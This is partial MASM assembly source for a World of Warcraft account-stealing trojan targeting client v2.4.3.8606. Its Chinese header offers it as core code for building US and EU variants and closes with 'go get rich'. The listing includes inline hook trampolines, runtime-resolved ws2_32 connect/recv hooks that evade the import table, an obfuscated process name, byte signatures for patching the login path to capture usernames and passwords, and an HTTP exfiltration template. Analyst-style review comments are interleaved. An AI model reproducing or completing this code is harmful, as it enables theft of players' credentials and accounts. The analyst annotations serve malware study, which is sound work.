对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Programmed by asm, MSN:asm32@live.cn ;
; WOWGameMaker For WOW_MF_OF ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Reference disassembly (wow.exe v2.4.3.8606) from which the two 15-byte signatures below were taken.
; Site 1 -- epilogue of the targeted function; the 15 bytes starting at 0041DAEA are szUserPassRealCode:
;0041DAEA |. 5E pop esi <------------- signature start; original note: "signature position + 12 = breakpoint position"
;0041DAEB |. 33CD xor ecx, ebp
;0041DAED |. 5B pop ebx
;0041DAEE |. E8 E7CAFEFF call 0040A5DA
;0041DAF3 |. 8BE5 mov esp, ebp
;0041DAF5 |. 5D pop ebp <------------- marked as the breakpoint location. This is signature + 11; retn 4 is at + 12,
;                                       so the "+12" note and this arrow disagree by one byte -- confirm in a debugger.
;0041DAF6 /. C2 0400 retn 4 <------------- after this ret the game continues at 005B55B4h. The trojan therefore searches
; for the byte pattern of that location instead of hard-coding the address, and once the address is found executes
; mov eax,hJmpEip / jmp eax. Caveat: both patterns embed the rel32 displacement of the call to 0040A5DA
; (E7CAFEFF / 1950E5FF), so they only match builds in which that distance is unchanged -- the address obtained is
; "generic" within this one client build, not across versions.
;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
; Site 2 -- the return site; the 15 bytes starting at 005B55B4 are szJmpEip:
;005B55B4 8B4D FC mov ecx, dword ptr [ebp-4] <----------------- per original note: obtains the address to jump to
;005B55B7 5F pop edi
;005B55B8 5E pop esi
;005B55B9 |. 33CD xor ecx, ebp
;005B55BB |. 5B pop ebx
;005B55BC |. E8 1950E5FF call 0040A5DA
;005B55C1 8BE5 mov esp, ebp
;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
; Both sites share the xor ecx,ebp / pop ebx / call 0040A5DA / mov esp,ebp sequence, which (with the
; mov ecx,[ebp-4] visible at 005B55B4) looks like the compiler's stack-cookie check epilogue; that shape is
; common to many functions, so the call displacement is what keeps each pattern from matching elsewhere.
; Treat the addresses and byte strings above as indicators of this one specific client build.
;----------------------------------------------------------------------------------------------------------------
; Build/ABI declaration: 32-bit x86 (.486), flat memory model, Win32 stdcall default.
; Every address and pointer in this file is therefore a 32-bit DWORD.
.486
.model flat,stdcall
option casemap:none
include debug.inc
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include comctl32.inc
includelib comctl32.lib
include psapi.inc           ; process/module enumeration (cf. the local MODULEINFO copy below)
includelib psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include Shlwapi.inc
includelib Shlwapi.lib
include shell32.inc
includelib shell32.lib
include macros.inc          ; author-supplied include, not shown in this listing
includelib mylib.lib        ; author-supplied library, not shown in this listing
include wininet.inc         ; WinINet is linked but no use is visible in this chunk; presumably the HTTP
includelib wininet.lib      ; exfiltration path (cf. szWOWFmt in .data) -- confirm in the rest of the file
; NOTE(review): ws2_32.inc is deliberately absent -- the Winsock exports are resolved at run time by name
; (DllName1 / ApiName1 / ApiName2 in .data), which keeps "connect"/"recv" out of the import table.
; HOOKAPI -- 7-byte inline trampoline. The struct is laid out so that its bytes ARE the
; machine code:
;   B8 imm32   mov eax, imm32     (PMyapi = address of the replacement routine)
;   FF E0      jmp eax
; Two instances (WritBak1 / WritBak2) live in .data and are presumably copied over the first
; bytes of a hooked routine by the WriteApi* procedures (bodies not in this listing). MASM does
; not pad a struct unless an alignment is given, so the 7 bytes are contiguous; the field order
; and sizes must not change -- the layout is the encoding.
HOOKAPI struct
a byte 0B8h                 ; opcode: mov eax, imm32
PMyapi DWORD 0              ; imm32 operand -- redirect target
d BYTE 0FFh                 ; opcode bytes: jmp eax
e BYTE 0E0h
HOOKAPI ends
; MODULEINFO -- local 12-byte copy of the psapi MODULEINFO layout
; (lpBaseOfDll, SizeOfImage, EntryPoint), presumably for GetModuleInformation-style
; queries of the target process. psapi.inc is already included above; if it defines
; the same name this copy is redundant -- confirm against the include.
MODULEINFO struct
lpBaseOfDll dword 0         ; module base address in the target process
SizeOfImage dword 0         ; mapped image size in bytes
EntryPoint dword 0          ; module entry point
MODULEINFO ends
F_STOP equ 0002h            ; flag value; its consumer is not in this listing
; Subroutine declarations. The bodies are outside this listing; the notes below are
; inferred from names and argument counts only and should be confirmed against the
; actual procedures. The stdcall ones follow .model; those marked "c" use the C convention.
HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD          ; 6-arg hook installers, three variants
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD                         ; 4-arg patch writers (presumably write a HOOKAPI stub)
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto :DWORD ,:DWORD,:DWORD               ; credential-capture routine reached from the patched wow.exe site (per header notes)
MyConnect proto :DWORD ,:DWORD,:DWORD;,:DWORD                       ; 3 DWORDs = connect(s, name, namelen); presumably the ws2_32!connect replacement
MyRecv proto :DWORD ,:DWORD,:DWORD,:DWORD                           ; 4 DWORDs = recv(s, buf, len, flags); presumably the ws2_32!recv replacement
GetApi proto :DWORD,:DWORD                                          ; (module, name) -> address, presumably; pairs with DllName1/ApiName* in .data
BakDll proto :DWORD,:DWORD
AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD                  ; byte-pattern search, presumably the scanner the header notes describe
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c                                          ; no args; by name, computes the wow.exe hook address
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD
; Initialised data. Role descriptions are an analyst's reading of this chunk; the procedures
; that use these variables are not in the listing, so anything beyond the literal bytes is
; marked as inferred. Note the trampolines and patch bytes live in writable .data and are
; copied into code pages elsewhere -- the write-enable step (VirtualProtect/WriteProcessMemory
; or similar) is not visible here.
.data
hInstance dd 0
WProcess dd 0               ; role not visible here; name suggests the target wow.exe process
Papi1 DWORD ?               ; three API address slots; presumably filled by GetApi -- confirm
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>         ; two 7-byte mov eax,imm32 / jmp eax trampolines (see HOOKAPI)
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)        ; 10-byte buffers, large enough for the 7 bytes a trampoline overwrites;
ApiBak2 db 10 dup(?)        ; presumably the saved original bytes used for restore
DllName1 db "ws2_32.dll",0  ; Winsock resolved at run time by name (no ws2_32.inc is included)
ApiName1 db "connect",0     ; hooked exports (cf. MyConnect / MyRecv prototypes)
ApiName2 db "recv",0
ApiName3 db "hook",0        ; not a ws2_32 export; its use is not visible in this chunk
szWowprocess db "g&mpm",0 ; obfuscated process name -- original comment says this encodes "wow.exe"; the decoder is not in this chunk
Dllbase1 DWORD ?
NowDllbase1 DWORD ?
NowDllbase2 DWORD ?
dwTemp dd ?
hAdress dd ?
;Dllbase2 DWORD ?
;NowDllbase2 DWORD ?
hRecvBak dd ?
hRecv dd ?
; 7 bytes: C2 04 00 = retn 4, then four CC (int3) padding. Same length as a HOOKAPI stub, and
; retn 4 matches the epilogue of the patched wow.exe site in the header disassembly -- consistent
; with writing it back over the trampoline. Original comment: "restore".
szJmp db 0C2h,04h,00h,0cch,0cch,0cch,0cch ; restore
; 24-byte expected prologue of recv. The first eleven bytes decode as
;   8B FF / 55 / 8B EC / 83 EC 10 / 53 / 33 DB = mov edi,edi; push ebp; mov ebp,esp; sub esp,10h; push ebx; xor ebx,ebx
; followed by 81 3D <28 40 A3 71> ..., i.e. a cmp against the absolute address 71A34028h. That absolute
; address pins the pattern to one specific ws2_32.dll build loaded at one specific base; it will not
; match any other build, so whatever compares against it (presumably HookApiRecv) fails or restores the
; wrong bytes elsewhere.
; NOTE(review): with 81h the instruction takes a 4-byte immediate and the tail 56 0F 84 5E 50 00 00 does
; not decode cleanly; with 83h it would read cmp dword ptr [71A34028h],56h / je rel32 (0F 84 5E 50 00 00).
; Either a transcription slip in this listing or a pattern that never matches -- verify against the real prologue.
szJmpRecv db 8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h
; Exfiltration body template: three URL-style key/value fields, then CR LF CR LF, which resembles the
; end-of-headers sequence of an HTTP request. wowu/wowp are presumably account name and password;
; what fills wowf is not visible here. The literal string, the adjacent "ws2_32.dll"/"connect"/"recv"
; strings and the two 15-byte signatures below are strong static indicators for this sample.
szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0
; 15-byte signature of the epilogue at 0041DAEA (see header): pop esi / xor ecx,ebp / pop ebx /
; call rel32 / mov esp,ebp / pop ebp / retn 4. It includes the call displacement, so it is build-specific.
szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
; 15-byte signature of the return site at 005B55B4 (see header): mov ecx,[ebp-4] / pop edi / pop esi /
; xor ecx,ebp / pop ebx / call rel32 / mov esp,ebp. Build-specific for the same reason.
szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
szEbpEnter db 6Ah, 40h, 5